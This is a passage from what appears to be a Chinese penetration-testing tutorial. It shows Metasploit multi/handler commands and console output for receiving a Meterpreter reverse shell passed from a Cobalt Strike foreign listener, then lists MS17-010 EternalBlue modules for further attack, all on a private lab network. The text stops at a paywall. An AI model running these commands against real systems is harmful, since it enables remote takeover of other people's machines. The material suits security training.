三、结合metasploit,反弹shell
在kali中开启使用命令开启metasploit
msfconsole┌──(root㉿oldboy)-[~]
└─# msfconsole
---
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
---
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may b
e specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
---
msf6 exploit(multi/handler) > set lhost 10.0.0.200
lhost => 10.0.0.200
---
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
---
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
---
在靶机中
使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址(10.0.0.200),端口为Metasploit所监听的端口(7777)。
开始攻击,建立会话:
msf6 exploit(multi/handler) > run
[*] Started HTTP reverse handler on http://10.0.0.200:7777
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Staging x86 payload (176220 bytes) ...
[!] http://10.0.0.200:7777 handling request from 10.0.0.101; (UUID: 2sotjla4) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.0.0.200:7777 -> 127.0.0.1) at 2024-05-28 21:41:00 +0800
----
meterpreter > shell
Process 1152 created.
Channel 1 created.
Microsoft Windows [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\����>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ��������:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.0.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.254
C:\Documents and Settings\Administrator\����>
如果有其他的主机上线,在增加会话中选择msf(的端口),该上线主机也能反弹shell
这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。
渗透:
C:\Documents and Settings\Administrator\����>^C
Terminate channel 1? [y/N] y
--------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/win OLDBOY-F74D04FE\Admi 10.0.0.200:7777 -> 1
dows nistrator @ OLDBOY-F 27.0.0.1 (10.0.0.101
74D04FE )
msf6 exploit(multi/handler) > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 exploit(multi/handler) > use ...
msf6 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/win OLDBOY-F
最低0.47元/天 解锁文章
扫一扫
4629
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
